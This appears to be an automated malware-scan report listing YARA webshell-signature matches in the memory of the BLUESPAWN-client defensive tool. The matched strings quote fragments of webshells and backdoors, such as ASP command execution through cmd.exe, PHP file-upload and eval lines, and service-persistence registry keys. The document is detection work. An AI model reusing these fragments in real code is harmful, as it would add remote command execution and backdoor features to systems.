- 0x36731c:$s3: const mVersion=
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sendmail | Webshells Auto-generated - file sendmail.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3143b6:$s3: _NextPyC808
- 0x3673d9:$s3: _NextPyC808
- 0x3143ce:$s6: Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)
- 0x3673e7:$s6: Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_zehir4 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314539:$s5: byMesaj
- 0x3674e4:$s5: byMesaj
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hkshell_hkshell | Webshells Auto-generated - file hkshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x314664:$s1: PrSessKERNELU
- 0x3675a1:$s1: PrSessKERNELU
- 0x31467e:$s2: Cur3ntV7sion
- 0x3675b1:$s2: Cur3ntV7sion
- 0x314697:$s3: Explorer8
- 0x3675c0:$s3: Explorer8
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | iMHaPFtp | Webshells Auto-generated - file iMHaPFtp.php | Yara Bulk Rule Generator by Florian Roth | - 0x3147bc:$s1: echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">
- 0x367677:$s1: echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Unpack_TBack | Webshells Auto-generated - file TBack.dll | Yara Bulk Rule Generator by Florian Roth | - 0x314929:$s5: \final\new\lcc\public.dll
- 0x367776:$s5: \final\new\lcc\public.dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DarkSpy105 | Webshells Auto-generated - file DarkSpy105.exe | Yara Bulk Rule Generator by Florian Roth | - 0x314a62:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
- 0x367841:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EditServer_Webshell | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x314bc5:$s2: Server %s Have Been Configured
- 0x367936:$s2: Server %s Have Been Configured
- 0x314bf0:$s5: The Server Password Exceeds 32 Characters
- 0x367957:$s5: The Server Password Exceeds 32 Characters
- 0x314c26:$s8: 9--Set Procecess Name To Inject DLL
- 0x367983:$s8: 9--Set Procecess Name To Inject DLL
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_reader | Webshells Auto-generated - file reader.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314d67:$s2: mailto:mailbomb@hotmail.
- 0x367a56:$s2: mailto:mailbomb@hotmail.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ASP_CmdAsp | Webshells Auto-generated - file CmdAsp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x314e9b:$s2: ' -- Read the output from our command and remove the temp file -- '
- 0x367b1c:$s2: ' -- Read the output from our command and remove the temp file -- '
- 0x2d6463:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x33b5de:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x34335e:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x35fb91:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x367b62:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x369436:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314f3e:$s9: ' -- create the COM objects that we will be using -- '
- 0x367bab:$s9: ' -- create the COM objects that we will be using -- '
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | KA_uShell | Webshells Auto-generated - file KA_uShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x315092:$s5: if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass
- 0x367c91:$s5: if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass
- 0x2eb6e4:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x3150e2:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x34980c:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x367cd7:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Backdoor_v1 | Webshells Auto-generated - file PHP Backdoor v1.php | Yara Bulk Rule Generator by Florian Roth | - 0x31524b:$s5: echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$th
- 0x367dd2:$s5: echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$th
- 0x31529f:$s8: echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy
- 0x367e1c:$s8: echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | svchostdll | Webshells Auto-generated - file svchostdll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x35009:$s0: InstallService
- 0x3502d:$s0: InstallService
- 0x38341:$s0: InstallService
- 0x38358:$s0: InstallService
- 0xb72bc:$s0: InstallService
- 0xb72e0:$s0: InstallService
- 0xba5f4:$s0: InstallService
- 0xba60b:$s0: InstallService
- 0x3153ed:$s0: InstallService
- 0x367efc:$s0: InstallService
- 0x315408:$s1: RundllInstallA
- 0x367f0d:$s1: RundllInstallA
- 0x315423:$s2: UninstallService
- 0x367f1e:$s2: UninstallService
- 0x315440:$s3: &G3 Users In RegistryD
- 0x367f31:$s3: &G3 Users In RegistryD
- 0x315463:$s4: OL_SHUTDOWN;I
- 0x367f4a:$s4: OL_SHUTDOWN;I
- 0x31547d:$s5: SvcHostDLL.dll
- 0x367f5a:$s5: SvcHostDLL.dll
- 0x315498:$s6: RundllUninstallA
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_server | Webshells Auto-generated - file server.asp | Yara Bulk Rule Generator by Florian Roth | - 0x315607:$s0: PageServer Below -->
- 0x368058:$s0: PageServer Below -->
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | vanquish | Webshells Auto-generated - file vanquish.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31573c:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged
- 0x36811f:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged
- 0x315799:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU
- 0x368172:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU
- 0x3157f6:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
- 0x3681c5:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | winshell | Webshells Auto-generated - file winshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x22512:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0xa47c5:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x315962:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x3682c3:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x3c5743:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x3159a4:$s1: WinShell Service
- 0x3682fb:$s1: WinShell Service
- 0x3159c1:$s2: __GLOBAL_HEAP_SELECTED
- 0x36830e:$s2: __GLOBAL_HEAP_SELECTED
- 0x3159e4:$s3: __MSVCRT_HEAP_SELECT
- 0x368327:$s3: __MSVCRT_HEAP_SELECT
- 0x315a05:$s4: Provide Windows CmdShell Service
- 0x36833e:$s4: Provide Windows CmdShell Service
- 0x315a32:$s5: URLDownloadToFileA
- 0x368361:$s5: URLDownloadToFileA
- 0x315a51:$s6: RegisterServiceProcess
- 0x368376:$s6: RegisterServiceProcess
- 0x8bf7d:$s7: GetModuleBaseNameA
- 0x10e230:$s7: GetModuleBaseNameA
- 0x315a74:$s7: GetModuleBaseNameA
- 0x36838f:$s7: GetModuleBaseNameA
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_remview | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x315bd3:$s2: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
- 0x368476:$s2: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
- 0x315c30:$s3: echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\"
- 0x3684c9:$s3: echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\"
- 0x315c8d:$s4: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<
- 0x36851c:$s4: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | saphpshell | Webshells Auto-generated - file saphpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x315dfd:$s0: <td><input type="text" name="command" size="60" value="<?=$_POST['command']?>
- 0x36861e:$s0: <td><input type="text" name="command" size="60" value="<?=$_POST['command']?>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006Z | Webshells Auto-generated - file 2006Z.exe | Yara Bulk Rule Generator by Florian Roth | - 0x315f75:$s1: wangyong,czy,allen,lcx,Marcos,kEvin1986,myth
- 0x368728:$s1: wangyong,czy,allen,lcx,Marcos,kEvin1986,myth
- 0x315fae:$s8: System\CurrentControlSet\Control\Keyboard Layouts\%.8x
- 0x368757:$s8: System\CurrentControlSet\Control\Keyboard Layouts\%.8x
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | admin_ad | Webshells Auto-generated - file admin-ad.asp | Yara Bulk Rule Generator by Florian Roth | - 0x316100:$s6: <td align="center"> <input name="cmd" type="text" id="cmd" siz
- 0x36883b:$s6: <td align="center"> <input name="cmd" type="text" id="cmd" siz
- 0x31614b:$s7: Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><
- 0x36887c:$s7: Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_casus15 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x3162bb:$s6: if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!=".."))
- 0x36897e:$s6: if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!=".."))
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | BIN_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316417:$s0: =====Remote Shell Closed=====
- 0x368a6c:$s0: =====Remote Shell Closed=====
- 0x316441:$s2: All Files(*.*)|*.*||
- 0x368a8c:$s2: All Files(*.*)|*.*||
- 0x316462:$s6: WSAStartup Error!
- 0x368aa3:$s6: WSAStartup Error!
- 0x316480:$s7: SHGetFileInfoA
- 0x368ab7:$s7: SHGetFileInfoA
- 0x31649b:$s8: CreateThread False!
- 0x368ac8:$s8: CreateThread False!
- 0x3164bb:$s9: Port Number Error
- 0x368ade:$s9: Port Number Error
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_uptime | Webshells Auto-generated - file uptime.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3165f8:$s0: JDiamondCSlC~
- 0x368bad:$s0: JDiamondCSlC~
- 0x316612:$s1: CharactQA
- 0x368bbd:$s1: CharactQA
- 0x316628:$s2: $Info: This file is packed with the UPX executable packer $
- 0x31c483:$s2: $Info: This file is packed with the UPX executable packer $
- 0x368bc9:$s2: $Info: This file is packed with the UPX executable packer $
- 0x36ccd1:$s2: $Info: This file is packed with the UPX executable packer $
- 0x316670:$s5: HandlereateConso
- 0x368c07:$s5: HandlereateConso
- 0x31668d:$s7: ION\System\FloatingPo
- 0x31c52e:$s7: ION\System\FloatingPo
- 0x368c1a:$s7: ION\System\FloatingPo
- 0x36cd5e:$s7: ION\System\FloatingPo
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Simple_PHP_BackDooR | Webshells Auto-generated - file Simple_PHP_BackDooR.php | Yara Bulk Rule Generator by Florian Roth | - 0x3167d4:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he
- 0x368cf3:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he
- 0x2e1866:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x316831:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x342fa1:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x368d46:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x306cf3:$s9: // a simple php backdoor
- 0x316888:$s9: // a simple php backdoor
- 0x35d5aa:$s9: // a simple php backdoor
- 0x368d93:$s9: // a simple php backdoor
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | sig_2005Gray | Webshells Auto-generated - file 2005Gray.asp | Yara Bulk Rule Generator by Florian Roth | - 0x3169c0:$s0: SCROLLBAR-FACE-COLOR: #e8e7e7;
- 0x368e5d:$s0: SCROLLBAR-FACE-COLOR: #e8e7e7;
- 0x3169eb:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x31791f:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x368e7e:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x369904:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x316a48:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x31797c:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x368ed1:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x369957:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x316a9b:$s9: SCROLLBAR-3DLIGHT-COLOR: #cccccc;
- 0x368f1a:$s9: SCROLLBAR-3DLIGHT-COLOR: #cccccc;
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DllInjection | Webshells Auto-generated - file DllInjection.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316be0:$s0: \BDoor\DllInjecti
- 0x368ff1:$s0: \BDoor\DllInjecti
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_v1_45_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316d19:$s2: cress.exe
- 0x31bdd9:$s2: cress.exe
- 0x3690bc:$s2: cress.exe
- 0x36c862:$s2: cress.exe
- 0x316d2f:$s7: \Debug\Mithril.
- 0x3690c8:$s7: \Debug\Mithril.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hkshell_hkrmv | Webshells Auto-generated - file hkrmv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316e5c:$s5: /THUMBPOSITION7
- 0x369187:$s5: /THUMBPOSITION7
- 0x316e78:$s6: \EvilBlade\
- 0x369199:$s6: \EvilBlade\
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpshell | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x316f9f:$s1: echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><b
- 0x369252:$s1: echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><b
- 0x316ffc:$s2: $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_UR
- 0x3692a5:$s2: $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_UR
- 0x317059:$s3: $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\",
- 0x3692f8:$s3: $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\",
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_cmd | Webshells Auto-generated - file cmd.asp | Yara Bulk Rule Generator by Florian Roth | - 0x2d63c8:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2dc850:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2e1d7f:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x309fdf:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3171c1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x33b557:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x33f92e:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x34331a:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x35fc16:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x3693f2:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x2d6463:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x2e1dcd:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x309f48:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x314eeb:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x31720f:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x33b5de:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x34335e:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x35fb91:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x367b62:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x369436:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_phpft | Webshells Auto-generated - file phpft.php | Yara Bulk Rule Generator by Florian Roth | - 0x317384:$s6: PHP Files Thief
- 0x36953d:$s6: PHP Files Thief
- 0x2eead6:$s11: http://www.4ngel.net
- 0x2f6413:$s11: http://www.4ngel.net
- 0x3173a0:$s11: http://www.4ngel.net
- 0x34ba80:$s11: http://www.4ngel.net
- 0x351215:$s11: http://www.4ngel.net
- 0x369550:$s11: http://www.4ngel.net
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_indexer | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x3174d4:$s3: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="r
- 0x369616:$s3: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="r
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | r57shell | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x317640:$s11: $_POST['cmd']="echo \"Now script try connect to
- 0x369715:$s11: $_POST['cmd']="echo \"Now script try connect to
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | bdcli100 | Webshells Auto-generated - file bdcli100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31778c:$s5: unable to connect to
- 0x3697f3:$s5: unable to connect to
- 0x3177ae:$s8: backdoor is corrupted on
- 0x36980b:$s8: backdoor is corrupted on
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_2005Red | Webshells Auto-generated - file 2005Red.asp | Yara Bulk Rule Generator by Florian Roth | - 0x3178ef:$s0: scrollbar-darkshadow-color:#FF9DBB;
- 0x3698de:$s0: scrollbar-darkshadow-color:#FF9DBB;
- 0x3169eb:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x31791f:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x368e7e:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x369904:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x316a48:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x31797c:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x368ed1:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x369957:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006X2 | Webshells Auto-generated - file 2006X2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x30e565:$s2: Powered By
- 0x317aef:$s2: Powered By
- 0x3630ad:$s2: Powered By
- 0x369a5c:$s2: Powered By
- 0x317b07:$s3: " onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.
- 0x369a6a:$s3: " onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rdrbs084 | Webshells Auto-generated - file rdrbs084.exe | Yara Bulk Rule Generator by Florian Roth | - 0x317c73:$s0: Create mapped port. You have to specify domain when using HTTP type.
- 0x369b68:$s0: Create mapped port. You have to specify domain when using HTTP type.
- 0x317cc4:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
- 0x369baf:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_CaseSwitch_2005 | Webshells Auto-generated - file 2005.exe | Yara Bulk Rule Generator by Florian Roth | - 0x317e34:$s1: MSComDlg.CommonDialog
- 0x369cb1:$s1: MSComDlg.CommonDialog
- 0x317e56:$s2: CommonDialog1
- 0x369cc9:$s2: CommonDialog1
- 0x317e70:$s3: __vbaExceptHandler
- 0x31d5e9:$s3: __vbaExceptHandler
- 0x369cd9:$s3: __vbaExceptHandler
- 0x36d8ab:$s3: __vbaExceptHandler
- 0x317e8f:$s4: EVENT_SINK_Release
- 0x31d608:$s4: EVENT_SINK_Release
- 0x369cee:$s4: EVENT_SINK_Release
- 0x36d8c0:$s4: EVENT_SINK_Release
- 0x317eae:$s5: EVENT_SINK_AddRef
- 0x369d03:$s5: EVENT_SINK_AddRef
- 0x317ecc:$s6: By Marcos
- 0x369d17:$s6: By Marcos
- 0x317ee2:$s7: EVENT_SINK_QueryInterface
- 0x369d23:$s7: EVENT_SINK_QueryInterface
- 0x317f08:$s8: MethCallEngine
- 0x369d3f:$s8: MethCallEngine
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | eBayId_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x318035:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x31c317:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x369dfe:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x36cbd3:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phvayv | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x318190:$s2: wrap="OFF">XXXX</textarea></font><font face
- 0x369eeb:$s2: wrap="OFF">XXXX</textarea></font><font face
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | byshell063_ntboot | Webshells Auto-generated - file ntboot.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3182de:$s0: SYSTEM\CurrentControlSet\Services\NtBoot
- 0x369fcb:$s0: SYSTEM\CurrentControlSet\Services\NtBoot
- 0x318313:$s1: Failure ... Access is Denied !
- 0x319555:$s1: Failure ... Access is Denied !
- 0x369ff6:$s1: Failure ... Access is Denied !
- 0x36ac70:$s1: Failure ... Access is Denied !
- 0x31833e:$s2: Dumping Description to Registry...
- 0x3195ae:$s2: Dumping Description to Registry...
- 0x36a017:$s2: Dumping Description to Registry...
- 0x36acb5:$s2: Dumping Description to Registry...
- 0x31836d:$s3: Opening Service .... Failure !
- 0x3195dd:$s3: Opening Service .... Failure !
- 0x36a03c:$s3: Opening Service .... Failure !
- 0x36acda:$s3: Opening Service .... Failure !
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_casus15_2 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x2f3972:$s0: copy ( $dosya_gonder
- 0x3184ad:$s0: copy ( $dosya_gonder
- 0x34f236:$s0: copy ( $dosya_gonder
- 0x36a10e:$s0: copy ( $dosya_gonder
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | installer | Webshells Auto-generated - file installer.cmd | Yara Bulk Rule Generator by Florian Roth | - 0x3185df:$s0: Restore Old Vanquish
- 0x36a1d2:$s0: Restore Old Vanquish
- 0x318600:$s4: ReInstall Vanquish
- 0x36a1e9:$s4: ReInstall Vanquish
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | uploader | Webshells Auto-generated - file uploader.php | Yara Bulk Rule Generator by Florian Roth | - 0x2f57d2:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x30885f:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x350914:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x35ea92:$s0: move_uploaded_file($userfile, "entrika.php");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_remview_2 | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x318734:$s0: <xmp>$out</
- 0x36a2af:$s0: <xmp>$out</
- 0x31874c:$s1: .mm("Eval PHP code").
- 0x31bbed:$s1: .mm("Eval PHP code").
- 0x36a2bd:$s1: .mm("Eval PHP code").
- 0x36c715:$s1: .mm("Eval PHP code").
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_r57 | Webshells Auto-generated - file r57.php | Yara Bulk Rule Generator by Florian Roth | - 0x31888c:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file'].
- 0x36a38f:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file'].
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006X | Webshells Auto-generated - file 2006X.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3189e9:$s1: <input name="password" type="password" id="password"
- 0x36a47e:$s1: <input name="password" type="password" id="password"
- 0x318a2a:$s6: name="theAction" type="text" id="theAction"
- 0x36a4b5:$s6: name="theAction" type="text" id="theAction"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phvayv_2 | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x318b75:$s2: rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font
- 0x36a592:$s2: rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | elmaliseker | Webshells Auto-generated - file elmaliseker.asp | Yara Bulk Rule Generator by Florian Roth | - 0x318cd2:$s0: javascript:Command('Download'
- 0x36a681:$s0: javascript:Command('Download'
- 0x318cfc:$s5: zombie_array=array(
